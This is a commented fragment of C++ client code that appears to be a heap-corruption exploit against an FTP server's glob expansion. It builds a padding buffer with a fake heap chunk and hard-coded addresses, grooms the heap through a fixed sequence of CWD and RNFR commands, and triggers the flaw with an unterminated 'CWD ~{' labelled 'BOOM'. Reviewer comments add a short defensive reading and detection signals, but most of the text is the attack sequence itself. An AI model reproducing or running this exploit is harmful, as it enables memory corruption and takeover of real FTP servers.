/*
 * Fragment of an FTP client routine: it builds one binary payload in `blaat`
 * and then sends a fixed sequence of CWD and RNFR commands through `conn`.
 * Several arguments carry glob metacharacters ('~', '{', ','), and the final
 * command is a CWD whose argument is the unterminated pattern "~{".
 * The enclosing function and the definitions of `blaat` and `conn` are
 * outside this fragment.
 *
 * NOTE(review): judging by the author's own comments ("the chunk", "pointer on
 * the heap", "size field"), the sequence depends on how the server allocates
 * and frees memory while expanding client-supplied path patterns, so the
 * statement order is significant and must not be rearranged.
 *
 * Defensive reading: a server should reject unbalanced braces before any glob
 * expansion takes place. On the wire, a CWD argument of exactly "~{" and CWD
 * arguments that mix long filler runs with non-printable bytes are practical
 * detection signals.
 */

/* padding -- presumably 96+32 = 128 copies of 'A'; append() is defined elsewhere */
blaat.append('A', 96+32);

/*
 * "the chunk" (author's label): four integer values appended after the padding.
 * NOTE(review): how append() encodes an integer (width, byte order) is not
 * visible here. The last two values look like hard-coded addresses, presumably
 * valid for one specific server build and environment only -- confirm.
 */
blaat.append(0xfffffff0);
blaat.append(-4);
blaat.append( 0x0806f7ac - 12 );
blaat.append( 0xbffffb49 );

/* send padding + chunk as the argument of a single CWD command */
conn.sendout("CWD %s\r\n", blaat.c_str());

/* author's note: getting pointer on the heap (CWD with a brace/comma glob pattern) */
conn.sendout("CWD %s\r\n", "~/{.,.,.,.}");

/* author's note: "24" -- presumably an allocation size; not verifiable from this fragment */
conn.sendout("RNFR %s\r\n", "././././././././");

/* building size field (author's label): three CWD arguments of decreasing length */
conn.sendout("CWD %s\r\n", "AAAAsiz");
conn.sendout("CWD %s\r\n", "AAAAsi");
conn.sendout("CWD %s\r\n", "AAAA\x69");

/* author's note: keeping it malloced */
conn.sendout("RNFR .\r\n");

/* author's note: filling (same RNFR argument as sent earlier) */
conn.sendout("RNFR %s\r\n", "././././././././");

/* final command: CWD with an opening brace that is never closed (author's note: BOOM) */
conn.sendout("CWD ~{\r\n");